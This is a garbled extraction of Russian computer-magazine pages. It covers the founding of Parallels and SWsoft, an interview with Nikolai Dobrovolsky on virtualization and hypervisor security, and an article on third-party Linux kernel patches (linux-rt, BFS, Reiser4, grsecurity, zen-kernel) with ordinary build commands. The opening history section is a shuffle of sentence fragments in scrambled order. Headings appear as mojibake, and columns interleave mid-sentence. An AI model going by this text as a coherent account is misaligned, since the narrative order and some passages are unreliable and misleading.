Сингапуре. А потом на Западе. никогда не сдаваться. этих разработчиков. Экономический пузырь доткомов лопнул. Итак. в 1975 году. ни много ни мало. но это требовало больших затрат. как гром среди ясного неба. На сегодняшний день головной офис компании Parallels расположился. рецепт прост и не содержит никаких «особенных ингредиентов» — лишь тяжелая работа. Добровольский начал уже на третьем курсе. но и целый ряд других фирм. после переезда на новое место жительства. к моменту окончания университета Николай приобрел немалый опыт. Так и родилась мысль. а в Новосибирске сконцентрированны службы поддержки. Дело стало за малым: осталось перестать работать на кого-то и начать работать на себя. не было никаких красивых «гениальных идей». И их немало. что не слишком характерно для нашей страны вообще. Какое-то время. и приключился печально знаменитый «dot-com bubble». что было бы круто запустить несколько ОС виртуально. что в МИРЭА. которая и станет впоследствии его коньком. и определенный фундамент. благо Дворец пионеров — тот. первого заказчика был сделан. это работало — среди партнеров компании числился уже не только Solomon Software. понадобилось запустить на новых компах. менеджеров и так далее — штат компании насчитывает уже 700 человек по всей планете. Начав с программирования калькуляторов в кружке Дворца пионеров. что свободные места тогда оставались только в кружке информатики. а устоявшие XÀÊÅÐ 10 /141/ 10 . Эта идея настолько захватила Добровольского. не имеющих поддержки IBM. как временных. уже после того. как проект под того самого. и для того времени в частности. Кстати. грянул кризис. что на Ленинских горах — был совсем рядом. Работать по специальности. что команда в конце 90-х занялась продвинутым аутсорсингом. прогеров. Первые халтуры Николаю подбросил его научный руководитель. родился в Москве. Вскоре подработка превратилась в постоянную работу. что полностью устроило его первых работодателей. Не последнюю роль в нелегком выборе между двумя вузами сыграл и тот факт. вовремя посетивших гения. В начале 80-х годов. он быстро учился и схватывал на лету. Так появилась на свет фирма Parallels. Николай загорелся мыслью создать отдельный. Так уж вышло. Хотя фактического опыта у Добровольского не было. Но помимо айтишных премудростей в МИРЭА давали и бизнес-дисциплины. Это окончательно решило дело — выбор был сделан не в пользу «Бауманки». Как же за неполный десяток лет Белоусову удалось провести компанию от средних размеров стартапа к миллионным прибылям и званию одного из крупнейших игроков рынка? Судя по всему. море затраченной энергии. во-вторых. и с редкими в ту пору компьютерами судьба свела его совершенно случайно. что Николай подал бумаги еще и в Московский институт радиотехники. в процессе работы над проектом для иностранного заказчика. в итоге. прежнее имя было признанно чересчур длинным и сложным. и прочих изящных поворотов судьбы. ряд старых систем. множество IT-компаний пошли ко дну вместе с ним. так и финансовых. Николай впервые столкнулся именно по работе. куда тоже благополучно прошел и где. в этот же период Standard & Western Software успел переименоваться в SWsoft. жизнь в разъездах. с которыми Добровольский перезнакомился по работе). ÊÎÌÏÀÍÈß ÑÅÐÃÅÉ ÁÅËÎÓÑÎÂ Ñ ÏÐÅÌÈÅÉ CNEWS AWARD Николай Добровольский. в Швейцарии. и остался. а после на автомате был зачислен и в саму «Бауманку». Однако с МГТУ у Добровольского не сложилось. Таким образом. Просто в 2000 году. уже в возрасте 14 лет он выиграл всероссийский конкурс по программированию. готовивший айтишников.

à âîò ñèñòåìó óïðàâëåíèÿ è õðàíåíèÿ äàííûõ âûäåëèëè â îòäåëüíûé ïðîåêò Acronis» ным). что за вузы мы заканчивали. Само собой. В те трудные времена Протасов сам вышел на Николая — он уже был осведомлен о разработках Parallels и считал их достаточно интересными и перспективными. Стоит отдельно заметить. и. и в итоге решено было прислушаться к «народной молве». стоит попытаться писать свой софт (этот процесс был во всех смыслах более контролируемым. Этот человек начинал свой путь в компании с должности сисадмина и спеца в области Unix. Все варианты и идеи взвешивались и продумывались. После трудного дня в офисе они возвращались домой и приступали ко второй. устроилась на вторую. предлагавших какой-то «непонятный софт». что просто создать продукт — мало. Однако на деле оказалось. К счастью. То был очень непростой период в истории SWsoft. Дело в том.. и в ней пока не слишком тесно. а точнее — в Москву. готовых работать за $300 в час). Впоследствии этот хостер даже ощутимо помог с бета-тестом. Тогда было принято решение перенести офис обратно в Россию. Коллеги и партнеры Сергея до сих пор поражаются. и. Сегодня это называется SaaS — software as a service или облачные вычисления. Стало окончательно ясно. квалифицированных инженеров. нашлись сведущие в этих темах инженеры (вот тебе и еще один пример. а ныне вообще занимает в Parallels пост старшего вице-президента и руководит R&D всех продуктов компании. клюнувшим на тогда еще даже недоработанное «управленческое» ПО от SWsoft. когда силы были уже совсем на исходе. чем заниматься дальше. и это в SWsoft поняли быстро. что сразу разработать и операционную систему. Интересно. конечно. скорее всего. О компании Белоусова в Нижнем узнали вовсе не от Сергея. и. даже личные сбережения). Станислав окончательно убедился в правоте своих суждений. что все инвесторы утверждали. Николай решил попытать счастья в России. похоже. их нужно было писать и делать фактически с нуля. хотя та была еще не готова и являла собой сыроватую бету. так как купленное ПО сразу же принялся использовать по назначению :). а финансовый поток из-за пузыря доткомов сильно обмелел. после этого его нужно было и кому-то продать. а не помогало делу. по признанию Белоусова. Рынок виртуализации тогда уже зародился и даже был немного «окучен» такими компаниями как VMware. Также Белоусов с коллегами пришли к мысли. что он сам приехал к разработчикам с наличными и буквально умолил их продать ему прогу в текущем виде. XÀÊÅÐ 10 /141/ 10 Со временем разработка ОС была прекращена вовсе (от нее остался продукт виртуализации Parallels Virtuozzo Containers). столько-то памяти и так далее. В таких обстоятельствах западным разработчикам стало не до аутсорса. и никому в скором будущем не будут интересны коробочные продукты. без скандалов. а через Интернет. что Добровольский и сделал. То есть. первая рабочая версия продукта. была готова. продолжаться не могло. Случиться могло все. понятным и. Встретившись с Добровольским лично и пообщавшись более детально. от крупных компаний до крохотных частных фирмочек. Теперь расположение компании в Сингапуре уже скорее мешало. главное — он обязательно должен иметь отношение к ASP (Application service providers). что угодно. Было ясно. а значит. К 2004 году. насколько мы серьезны и можно ли вообще вести с нами какие-то дела. Долго так. по большому счету. ориентированного на нужды хостинг-провайдеров и иже с ними — это ниша весьма перспективная. стал небольшой хостер из Нижнего Новгорода. Но какой софт писать?. что софт может быть каким угодно. устав безрезультатно искать инвестиции на Западе. наконец. не менее сложной работе — писали собственный софт. В итоге. Он признается. Дескать. ÍÎÂÅÉØÀß ÈÑÒÎÐÈß. что «Microsoft — уже все». что было страшно — маленькая команда с вроде бы интересной разработкой на руках.. и систему управления и хранения данных — это несколько чересчур. что от слияния все только выиграют — разработки Parallels были крайне интересны и должны были идеально 083 . Как ни смешно.. Но дело не в том. содержать российских разработчиков в Сингапуре стало крайне затруднительно — конкурировать с теми же индусами по стоимости рабочей силы не представлялось возможным. «Ñî âðåìåíåì ðàçðàáîòêà ÎÑ áûëà ïðåêðàùåíà. больше напоминавшая прототип. Теперь можно было рискнуть и расстаться с «Росгосстрахом». почему хорошо иметь команду подготовленных. как у него тогда вообще хватило терпения пережить все эти трудности и не бросить все к черту. но на двух работах эти отчаянные люди продержались более года. Белоусов и его команда понимали. так как это название и сегодня знакомо каждому уважающему себя IT’шнику. Этот вопрос обсуждали долго. каждому юзеру выделялись фиксированные «железные мощности» — определенное количество места на хардах. Хостеру так приглянулась бета-версия софтины Virtuozzo Containers. но к моменту знакомства с Добровольским уже возглавлял московский офис SWsoft.оказались в очень трудном положении. Примерно тем же занимался в это время и Николай Добровольский. ÏÐÎÄÓÊÒÛ Вначале Николай Добровольский познакомился с одним из основателей SWsoft — Станиславом Протасовым. стало быть. как ты догадался. чтобы хоть как-то сводить концы с концами и не бросать разработку. В довершении всего.. часть команды Parallels (включая самого Николая). В русских тогда (да и сейчас) вообще инвестировали крайне неохотно — западным воротилам из венчурных фондов плохо понятно. а в том. и у SWsoft резко поубавилось как работы. которая все тянулась и тянулась. Сергей Белоусов лично отправился колесить по свету — он встречался с представителями самых разных хостинг-провайдеров и датацентров. так как для разработок нужны были деньги. В это же время компания озадачилась и активным поиском инвесторов. Комментарии здесь излишни. разумеется.. что на продвинутом аутсорсинге можно поставить крест. постоянную работу в «Росгосстрах». В компании. а это штука ресурсоемкая и непростая. Однако решения тех дней были еще весьма далеки от идеала — в основном они строились на принципе виртуализации на уровне оборудования. тут-то они. чья Parallels тоже остро нуждалась в инвестициях и клиентах. На дворе был 2003 год. и ощутимо било по карману. а не клан индусов. немалую часть средств в SWsoft тогда из собственного кармана вкладывал сам Сергей Белоусов (на поддержку шли и деньги. И. пришло время компанию перепрофилировать и решать. что в это же самое время Сергей пытался найти инвесторов для своих приятелей. что. более прибыль- что сегмент софта. но первым и на довольно долгое время последним клиентом. после чего и представил главу Parallels Сергею Белоусову. В то время очень активно обсуждались идеи. и нашли друг друга — SWsoft и Parallels встретились. какова наша квалификация. так и клиентов. а вот систему управления и хранения данных выделили в отдельный проект Acronis. будущее за Linux и ASP (Application Service Providers). Своих продуктов у компании на тот момент не имелось. полученные от других проектов. софт скоро будет продаваться и предоставляться исключительно в качестве сервисов. это нельзя было назвать рациональной тратой ресурсов. и вряд ли эта задача вообще под силу SWsoft. но спокойно и рассудительно. и SWsoft начал работу в означенном направлении. но иных вариантов уже попросту не оставалось. что в это же время SWsoft попыталась создать и некую единую платформу для ASP-приложений. как ты понимаешь. что это был за софт. Инвесторы идти навстречу российским бизнесменам не спешили.

—крайне популярную благодаря одноименной панели управления для сервиспровайдеров. а рынок порой меняется стремительно. которая позволяла после перезагрузки юзать на «Маке» либо Windows. не будет сильным преувеличением :). настоятельный «совет» переориентироваться на западный рынок дали Parallels именно «старшие товарищи». ни о какой виртуализации речи не шло. и.СЦЕНА ÄÎÁÐÎÂÎËÜÑÊÈÉ È ÌÅÄÂÅÄÅ ÀÍÍÃËÎßÇÛ×ÍÛÕ ÑÎÒÐÓÄÍÈÊΠÊÎÌÏÀÍÈÈ Ó×ÀÒ ÐÓ ÐÓÑÑ ÑÑÊÎ Ê ÌÓ ßÇÛÊÓ вписаться в линейку продуктов SWsoft. Интересен и тот факт. То есть. В том же 2005 году. либо Mac OS. как в вопросах разработки коммерчески успешного ПО. Добровольский лично съездил в Германию. базирующуюся в Новосибирские. всецело сосредоточиться на работе. Дело в том. С выходом же виртуальной машины Добровольского у всех яблофагов наконец-то появился удобный способ пользоваться «виндовым» софтом и железками. Налаживались и продажи ПО для автоматизации — Сергей Белоусов все же не зря колесил по свету и общался с людьми. что наши инженеры и специалисты — одни из сильнейших и лучших в мире. Сказать. но и пристально следят за новыми технологиями. растят новое поколение айтишников. фактически ставший стандартом в мировой индустрии (мегодня он называется Parallels Plesk Panel). Узнав о смене архитектуры. то есть от постоянных размышлений на тему «где взять денег?» и от бумажных проблем. Вплоть до 2008 года Parallels оставалась дочерней компанией холдинга SWsoft. Сегодня Parallels не только поддерживают и развивают написанный ранее софт. Среди решении в области виртуализации имеются высокотехнологичныи Parallels Virtuozzo Containers. что. Совсем скоро Николай Добровольский доказал. что именно тогда. И в случае Parallels эта вера полностью себя оправдала. В различных интервью Николай потом не раз говорил. все же мы не оракулы и не провидцы. Insight Venture Partners и Intel Capital. что сам Apple тогда выпустил утилиту BootCamp. Помощь более опытных инженеров из команды Белоусова здесь пришлась очень кстати. Стоит заметить. в 2006 году. на протяжении полутора с лишним лет продукт Parallels был фактически единственным решением такого рода — тяжеловесным компаниям-монстрам ПО-разработки понадобилось почти два года. появился на свет и Parallels Desktop для Mac. Parallels Workstation. но и в целом воспитывают себе смену. а последний уже мог предложить Добровольскому и его разработчикам столь необходимые им инвестиции. разумно храня свои новые идеи в тайне. Однако заявить. Кроме того. а в будущем разместить ее на бирже.5 месяца. они не только готовят себе новые кадры. что компания хорошо закрепилась в сфере ПО для виртуализации и автоматизации. К примеру. что в него инвестировали и поверили не зря. что Parallels на сегодняшний день очень тесно сотрудничает с рядом российских вузов — с Новосибирским и Московским университетами. вкладывая свое время и средства в обучение студентов. стараясь досконально узнать. с московским Физтехом и так далее. «Продаваться» кому-либо Parallels пока не планируют — напротив. и наверняка разрабатывают что-нибудь новенькое. у нас «Маки» до сих пор не столь сильно распространены) и принесло Parallels миллионные прибыли. а также продукт для массовых пользователей Parallels Desktop для Mac. Уже в 2005 году из-под его пера вышла первая законченная версия софтины виртуализации десктопов для Windows. z XÀÊÅÐ 10 /141/ 10 . так и в вопросах маркетинга и ведения бизнеса в целом. уже можно смело. и без того довольно удачном для SWsoft. а в 2006. Parallels стал частью холдинга SWsoft. В итоге детище Добровольского завоевало миллионы пользователей (преимущественно западных. что Добровольскому тогда пришлось почти полностью переделывать свой проект. Избавившись от головной боли. что существенно упрощало и облегчало работу виртуальных машин на «Маках». как выяснилось. Parallels Server для Mac. наконец. но затем было принято решение о ребрендинге и полном слиянии. у лидеров компании есть желание и далее держать Parallels в роли независимой единицы. Каково будущее Parallels — сказать сложно. Такой шанс упускать было нельзя. к компании пришли и масштабные инвестиции сразу от ряда солидных венчурных фондов: Bessemer Venture Partners. что нужно сервис-провайдерам от софта. чьи продукты уже успели заработать на рынке определенный вес и репутацию. Сделку заключили быстро. Бета-версия 084 Parallels Desktop для Mac была готова через рекордные 3. Именно в Plesk разработали и выпустили сверхпопулярный продукт для автоматизации хостинга. не имеющими «дров» под Mac OS. при этом оставшись самостоятельной компанией. Тогда-то и произошел столь редкий прецедент — новообразованная компания решила использовать не свое прежнее имя. буквально порвав рынок. что он очень многому научился у этих людей. Apple решила перейти на процы от Intel. согласно полученным рекомендация. безо всяких ребутов и извращений. Добровольский и его люди смогли. а имя своей «дочки». Еще в 2003 году SWsoft поглотила компанию Plesk Inc. чтобы написать и выпустить свои аналоги. Ведь недаром лидеры Parallels всегда верили в то. На вопрос «зачем?» в Parallels отвечают. привез оттуда новенький «Макинтош» и с головой ушел в работу.

ÈÍÒÅÐÂÜÞ Ñ PARALLELS
ÍÀ ÝÒÈ ÂÎÏÐÎÑÛ ÎÒÂÅ×ÀÅÒ ÍÈÊÎËÀÉ ÄÎÁÐÎÂÎËÜÑÊÈÉ

одной архитектуры на другой. Например, можно запустить приложение
iPhone в эмуляторе на Mac. Виртуализация – это кардинально другая технология. Практически все команды, которые исполняются в виртуальной
машине, работают нативно на процессоре. Проигрыш в производительности эмулятора в сотни-тысячи раз, а при виртуализации он минимален, т.к. используются обычно простаивающие при нормальной работе
компьютера ресурсы.
С точки зрения безопасности - насколько безопасно исполнение кода
в виртуальной среде и не может ли быть «пенетраций», схожих с
пофиксеными в VMware в свое время?
Ошибки возникают в любом коде. И гипервизор не исключение. Поэтому
совсем исключать возможность обнаружения таких ошибок в будущем
невозможно. Тем не менее, объём кода в гипервизоре достаточно мал,
а интерфейсы просты и постоянно анализируются на предмет безопасности. Поэтому вероятность появления ошибок в гипервизоре, скажем,
ничуть не больше, чем в BIOS. В случае же обнаружения ошибок они быстро исправляются, и обновления тут же доставляются пользователям. И
это намного проще, чем если ошибка допущена в железе. Например, в
процессорах Intel Pentium была ошибка операции деления и компания
отзывала эти процессоры даже из уже проданных компьютеров. Поэтому
с точки зрения безопасности нет особых отличий между исполнением
программы или ОС внутри виртуальной машины или напрямую, особенно
учитывая то, что все больше и больше функций берет на себя процессор
по запуску этих ВМ.

Если говорить о Parallels Desktop for Mac и for Windows и Linux интересно было бы узнать, насколько охотно производители железа идут на
встречу «эмуляторщикам», и как далеко заходит это сотрудничество?
Мы тесно взаимодействуем со всеми ключевыми поставщиками железа.
Они всегда предоставляют нам ранние образцы своих продуктов для тестирования совместимости, и чтобы мы могли как можно раньше начать
использовать новую функциональность железа в своих программах. Заинтересованность в таком взаимодействии и у производителей железа,
и у разработчиков обоюдная. Все хотят, чтобы их клиенты были довольны
комплексно продуктом и тем, как он решает их задачи.
Вопрос, в некотором роде, продолжающий предыдущий: насколько
хорошо железо будущего будет адаптировано под эмуляторы и готовы ли к этому разработчики оных (в частности - вы)?
Конечно, все производители железа уже давно осознали перспективность виртуализации. Все инфраструктурные компоненты будут рано или
поздно виртуализированы. Но эмуляторы – это не виртуализация. Эмулятор создан для того, чтобы эмулировать какие-то команды посредством
других доступных команд. В основном, он нужен для работы программ
XÀÊÅÐ 10 /141/ 10

Любому разбирающемуся человеку понятно, что больше «фишек» будет реализовано в гипервизоре, тем сложнее, массивнее и «прожорливее» получится код. Нашли ли вы некий баланс производительности/
качества в этом вопросе, на большие ли «жертвы» приходится идти?
Да, конечно, при разработке гипервизора очень важно оптимизировать
код таким образом, чтобы в нём был реализован только «минимально-необходимый» функционал. Мы это отлично понимаем и всегда
старались следовать этому принципу. Поэтому нельзя сказать, что нам
приходится идти на какие-то жертвы - просто мы следуем базовым принципам разработки нашего продукта.
При этом, в гипервизоре нет как таковых фишек, есть возможность
эффективно запускать виртуальную машину. Все функции, которые
добавляются к нашему приложению, не связаны в большинстве своем
с запуском ВМ. Они нацелены на повышение удобства работы пользователя с приложением. Ведь в результате пользователю важна не голая
производительность какого-то микро задания, а в целом скорость и
удобство работы со своим компьютером. Поэтому все наши особо любимые пользователями «фишки», потребляя какое-то минимальное количество дополнительных ресурсов, предоставляют массу преимуществ.
Например, есть функция SmartSelect, которая позволяет вам открыть
ваш Word-документ с рабочего стола Мака сразу в виртуальной машине
под Windows. И вам не надо для этого специально предварительно
запускать виртуальную машину, переносить туда файл документа, открывать там Word, потом в нем открывать этот документ, и «через левое ухо»
пересохранять внесенные изменения сначала в ВМ, а потом в версию с
рабочего стола Мака. Мы все это делаем на автомате. И не так важно, что
для этого сценария требуется сразу несколько фишек и SmartSelect, и
SharedFolders, и SharedProfiles и Coherence. Они, естественно, чуть-чуть
загружают процессор, зато наши пользователи в целом выигрывают во
много раз в удобстве и скорости выполнения своих задач.

085

UNIXOID
Юрий «Adept» Видинеев adeptg@gmail.com

ÒÅÐÌÎßÄÅÐÍÛÉ
ÑÈÍÒÅÇ
Îáçîð ïàò÷åé äëÿ Linux, íå âõîäÿùèõ â âàíèëüíîå ÿäðî
Есть много причин, по которым хорошую перспективную технологию могут не
принимать в официальную ветку Linux — Линус славится своими жесткими
требованиями к новому коду. Но от этого факта менее интересными такие
технологии не становятся. И иногда ради них стоит пересобрать ядро с
наложением стороннего патча.
КАКИМИ БЫВАЮТ ЛИНУКСЫ
Ванильным (официальным) принято считать
ядро, которое можно найти на kernel.org, и главным покровителем которого является сам Линус.
На сайте можно скачать старое ядро ветки 2.4.x
(которое уже практически не поддерживается)
или несколько стабильных (или не очень :) ) ядер
ветки 2.6.x. Нестабильные ядра имеют суффикс
«-rc», а ежедневные снапшоты из git'а — «rc-git».
Обычно выходит 7-9 rc-релизов, прежде чем ядро
обретает статус стабильного. В среднем, стабильные релизы выходят 4-5 раз в год, а последний на
момент написания статьи релиз — 2.6.35.

LINUX-RT
Пожалуй, самый известный сторонний патч.
Позволяет превратить обычный Linux в ОС
реального времени. И хотя главное применение такой операционки — промышленные и
встроенные системы, на обычном десктопе она

086

тоже может быть интересна. Например, тем, кто
часто занимается обработкой звука или видео
или постоянно грузит систему какими-нибудь
ресурсоемкими вычислениями. Встречаются
также свидетельства о положительном эффекте
от применения этого ядра на highload-серверах. Я же ничего, кроме слегка упавшей общей
производительности системы, не заметил.
Скачать патч можно по адресу www.kernel.
org/pub/linux/kernel/projects/rt/. Последняя
стабильная версия — 2.6.33.6-rt27. В некоторых
дистрибутивах realtime-ядро уже присутствует
в репозитории. Например, в Ubuntu для установки rt-ядра достаточно выполнить

нии указать опцию Processor type and features
Æ Preemption Mode (Complete Preemption
(Real-Time)). И еще рекомендуется отключить опцию Kernel hacking Æ Check for stack
overflows, так как она повышает латентность.
Чтобы можно было собирать некоторую статистику по времени отклика, при конфигурировании нужно также включить: Kernel hacking Æ
Tracers –> Kernel Function Tracer, Interrupts-off
Latency Tracer, Interrupts-off Latency Histogram,
Preemption-off Latency Traver, Preemption-off
Latency Histogram, Scheduling Latency Tracer,
Scheduling Latency Histogram, Missed timer
offsets histogram. После сборки ядро должно
содержать в имени PREEMPT и RT, например:

$ sudo apt-get install linux-rt

В других же дистрибутивах ядро с этим патчем
можно легко собрать. Для этого надо наложить
патч на ванильное ядро и при конфигурирова-

$ uname -v
#1 SMP PREEMPT RT Wed Aug 4 00:40:34
YEKST 2010

XÀÊÅÐ 10 /141/ 10

HTTP://WWW
links

Опции grsecurity
с разделами reiser4, надо поставить reiser4progs. Во многих
дистрибутивах этот комплект утилит есть в репозитории:

Ситуация с поддержками новых фич в ядре :)

Чтобы потешить собственное самолюбие, можно включить
сбор статистики:
# echo 1 >/sys/kernel/debug/tracing/latency_
hist/enable/wakeup

Саму статистику смотрим тут:
$ grep -v " 0$" /sys/kernel/debug/tracing/
latency_hist/wakeup/CPU0

Самое интересное там: значения минимального, среднего и
максимального времени отклика.

BFS
Широко известный в узких кругах анестезиолог-линуксоид
Кон Коливас с переменным успехом поддерживает собственную ветку (точнее, набор патчей) Linux. Главным нововведением в его патчсете является новый планировщик BFS
(Brain Fuck Scheduler), являющийся альтернативой стандартному CFS и показывающий, по результатам тестов, улучшенную отзывчивость ядра на десктопе (другими словами,
при использовании BFS жадные до графических ресурсов
приложения получают ощутимый прирост производительности, а раздражающие паузы, возникающие, например,
при переключении между ресурсоемкими программами, которые требуют доступ к диску, становятся менее заметными,
либо исчезают совсем). Скачать исходники можно отсюда:
www.kernel.org/pub/linux/kernel/people/ck/patches/2.6.
После наложения патча (текущая версия — 2.6.34-ck1) станет доступна опция General Setup Æ BFS cpu scheduler.

REISERFS
Исходя из тестов и многочисленных отзывов, это очень
быстрая файловая система. В настоящее время ее разработкой занимается наш соотечественник, Эдуард Шишкин,
и группа энтузиастов. Эдуард полон оптимизма и решительности включить Reiser4 в ванильное ядро. Последний на
момент написания статьи патч (reiser4-for-2.6.34.patch.gz)
скачать можно здесь: ftp://ftp.kernel.org/pub/linux/kernel/
people/edward/reiser4/reiser4-for-2.6. После наложения
патча появится опция File Systems Æ Reiser4. Но поддержка
ядром ФС — это еще не все. Чтобы можно было оперировать
XÀÊÅÐ 10 /141/ 10

kernelnewbies.org
lkml.org — архив
почтовой рассылки
Linux Kernel Mailing
List
liquorix.net —
Debian-репозиторий
для тех, кому лень
самому собирать
zen-kernel
grsecurity.net
ccache.samba.org
zen-kernel.org
ksplice.com

$ sudo apt-get install reiser4progs

Соответственно, основные операции с ФС:
• mkfs.reiser4 — создать раздел с reiser4;
• fsck.reiser4 — проверить раздел с reiser4;
• measurefs.reiser4 — посмотреть параметры раздела с
reiser4.

GRSECURITY
Патч, содержащий потрясающее количество механизмов
для повышения защищенности Linux-системы. Опции
компиляции grsecurity расположены в Security options Æ
Grsecurity. Есть три уровня безопасности на выбор: низкий,
средний и высокий. Низкий уровень рекомендован, когда
более высокие уровни не подходят из-за использования
нестандартного набора ПО. Он содержит:
• защиту ссылок и FIFO — пользователям запрещается
переходить по ссылкам (писать в FIFO), владельцем которых
является другой пользователь;
* запрет пользователям на чтение dmesg — у всех пользователей, кроме root, отберут право на чтение системных
сообщений ядра;
• начальную защиту chroot — рабочая директория для всех только
что запущенных в песочнице приложений будет принудительно
установлена в корневую директорию chroot.
В среднем уровне защиты дополнительно добавятся технологии:
• дополнительные ограничения для приложений, запускаемых в chroot: запрет монтирования и mknod (создание
именованных каналов, специальных символьных и блочных
файлов), запрет на двойной chroot, запрет на запись в sysctl
и другое;
• ограничение прав на чтение /proc для пользователей, не
входящих в заранее заданную группу (по умолчанию wheel);
• ограничение записи в /dev/kmem, /dev/mem и /dev/port;
• рандомизация адресного пространства;
• серьезное логирование подозрительных событий (неудавшихся вызовов fork(), попыток изменения системного
времени, сигналов вроде SIGSEGV и подобных).
Высокий уровень еще больше затягивает узлы, так как
дополнительно:
• ограничивает права на чтение /proc — теперь пользователи смогут читать из /proc информацию только о своих
процессах. Можно также указать GID специальной группы,
которая сможет читать любую информацию из /proc.
• накладывает ограничения на работу процессов в chrootокружении: отключение возможности устанавливать suidбит, отключение возможности посылать некоторые сигналы

INFO

info
• fakeroot —
эмулирует для
программы
получение рутовых
привилегий.
Позволяет создавать
пакеты, не прибегая
к sudo.
• Шедулер BFS
используется в
проекте Android.
• Утилита hackbench
(developer.osdl.org/
craiger/hackbench/
src/hackbench.c)
может пригодиться
при тестировании
планировщика
BFS. Она измеряет
скорость создания
указанного числа
процессов и скорость
обмена данных
между ними.
• Kernel Check
(kcheck.sf.net) —
набор python'овых
скриптов,
позволяющих за
пару щелчков мыши
сделать свежий debпакет ядра, включая
необходимые патчи.

087

предоставляющая on access доступ к файлам. реализующий продвинутый hibernate («спящий режим» — при выключении содержимое ОЗУ скидывается на винт. 088 $ sudo apt-get install gradm2 ZEN-KERNEL Zen-kernel — наверное. чтобы можно было без проблем собирать в /usr/src: XÀÊÅÐ 10 /141/ 10 . В дополнение система еще имеет веб-интерфейс.95 в месяц за один физический сервер (если серверов больше 20. хотя в других дистрибутивах последовательность действий будет аналогичной. как изменение системного времени или перезагрузка компа. где можно посмотреть статус всех своих подключенных серверов. Grsecurity Æ Sysctl support. • поддержка FatELF — формата бинарников. поэтому его и буду мучить. не перезагружаясь. не так уж и дорого — $3. что может пригодиться для сборки: $ sudo apt-get install build-essential libncurses5-dev \ libgtk2. в принципе. У них есть два репозитория: zen-stable. ее рекомендуется использовать лишь в тестовых целях. сказка. • включает рандомизацию стека ядра. • добавляет дополнительное логирование (в том числе всех mount/ umount). то $2. ядро и патчи выбраны. Так как эта директива отрицательно влияет на общую безопасность системы. Gamecube/Wii.com. позволяющий снижать напряжение CPU для уменьшения энергопотребления и температуры. • обновленные и добавленные дрова (для Lenovo ThinkPad SL. Зато # uptrack-show расскажет всю правду об установленных апдейтах. Управление пользователями и их ролями осуществляется с помощью специальной утилиты gradm2. позволит включать/отключать параметры безопасности через sysctl без необходимости пересобирать ядро.git (синхронизация с git-хранилищем Линуса и наложение тестовых патчей). Помимо уровней безопасности при конфигурации можно включить/ отключить RBAC (Role Based Access Control) — управление доступом на основе ролей.6. WiFi-чипов и другого). А поддержка десктопной убунты вообще бесплатна.com — платный сервер обновлений для ядер распространенных дистрибутивов. чем стандартное generic-ядро ubuntu. Получить zenkernel можно тремя способами: • скачать архив с последним релизом (за номером 2.0-dev libglade2-dev libqt3-mt-dev git-core Добавим своего юзера в группу src. Если нужно просто пересобрать имеющееся ядро (изменив опции конфигурации). Есть вариант Custom. Широко используется различными антивирусами. позволяющий отдельно выбрать все необходимые опции. если б не одно «но» — все это работает только со стандартным ядром твоего дистра — никаких тебе патчей и обновлений версий ядра.UNIXOID ksplice. • Tuxonice — патч. ограничение на выполнение таких системных задач. Набор сторонних патчей меняется от релиза к релизу и на данный момент включает в себя: • патчи от Кона Коливаса (в том числе BFS). содержащего в одном файле варианты для нескольких архитектур (аналог Universal Binary в Mac OS X). умеет присылать на e-mail уведомления о выходе новых патчей.95). Установка очень проста — добавляется репозиторий и ставится программулина uptrack. самая большая пачка заплаток ядра в одном месте. наложенными на стабильное ядро) и zen. Еще одна интересная опция. то проще скачать исходники ядра с помощью стандартного менеджера пакетов твоего дистрибутива и собирать уже их: $ sudo apt-get install linux-source Но мне zen-kernel нравится больше. • Reiser4. • скачать патч для нужной версии и наложить самому. а используя ksplice. можно приступать к сборке. Потом делается # uptrack-upgrade И все обновления установлены! Правда. • DazukoFS — виртуальная ФС. • забрать версию с уже наложенными патчами из git'а.git (с патчами. да вот беда — вышел secutity-update ядра твоего дистрибутива. при включении — восстанавливается). И такое rebootless счастье стоит. • добавляет ограничение на чтение информации о ядре через системные вызовы для обычных пользователей (для root эта возможность остается). Но ребут — это downtime сервера. Опишу сборку своего ядра на примере Ubuntu. И оставлять сервер с уязвимостью — тоже не дело. Придется искать второй сервер для временного переноса функционала с первого. Необязательно в качестве Security Level выбирать один из имеющихся уровней. Позиционируется как быстрое ядро для десктопов. присутствующей в большинстве дистрибутивов: Ñêàæè «íåò!» ðåáóòó Допустим. Есть выход гораздо проще: можно обновлять ядро. который должен быть доступен 24x7. Он отлично работает. • Linux-PHC — проект. Есть триальный доступ на 30 дней. у тебя есть высоконагруженный production-сервер. Расценки на rebootless nconfig — замена menuconfig внешним процессам. В общем.34-zen1). и надо бы перезагрузиться. Macbook. «uname -a» все еще показывает старую версию. УНИВЕРСАЛЬНАЯ СБОРКА Итак. Поставим все.

• make xconfig — графический интерфейс на базе QT. äîñòóïíû òàêæå âàíèëüíûå âåðñèè Выбираем последнюю патченную версию: $ git checkout v2.6. Но я всегда придерживаюсь нескольких простых правил: • Все. • make nconfig — одно из нововведений ядра 2.34 $ zcat . использующий ncurses. как наложится патч.34-zen1 Сорцы не обязательно вытягивать из git. Тоже псевдографический. соответственно. на которой у меня /) и будет нужно часто. позволяюXÀÊÅÐ 10 /141/ 10 щую протестировать. прежде чем его накладывать. 089 . • make defconfig — конфиг с настройками по умолчанию. Задаст вопросы только про те пункты. то быстрее и дешевле будет скачать патч и официальное ядро. что точно не пригодится.bz2 | patch -p1 Утилита patch также имеет замечательную опцию '--dry-run'./patch-2. Заплатка накладывается следующим образом: $ cd /usr/src/linux-2.6. • make allnoconfig/allyesconfig — генерируется конфиг. Система задаст несколько тысяч вопросов (по одному на каждую опцию конфигурации). Мне больше привычен интерфейс menuconfig. Все. чем menuconfig. какие ветки есть в репозитории: $ git tag # êðîìå ïàò÷åííûõ. Все.6. Далее выбираем способ конфигурирования ядра: • make config — для тех. • make randconfig — самый веселый способ — использует Великий Рандом для ответа на вопросы. интерфейс.35. но выглядит несколько более свежо. интерфейс.6. • make oldconfig — при использовании старого конфига.git linux-2. выкидываем.. • make menuconfig — псевдографический.6-zen Смотрим. что может пригодиться или будет нужно редко — компилирую модулем. использующий ncurses. • make gconfig — графический интерфейс на базе GTK. я включаю в ядро.Состояние раздела с reiser4 $ sudo usermod -a -G src adept Клонируем git-репозиторий (приготовься скачать около 500 метров): $ cd /usr/src $ git clone git://zen-kernel. Если ты ограничен по трафику или скорости инета. что мне точно понадобится (в том числе поддержка ФС.org/kernel/zen-stable.35. в котором на все вопросы отвечено no/yes. Какие-то конкретные советы по конфигурированию ядра давать сложно — все очень сильно зависит от имеющегося окружения и желаемых результатов. которых не было в старом конфиге. у кого уйма свободного времени.

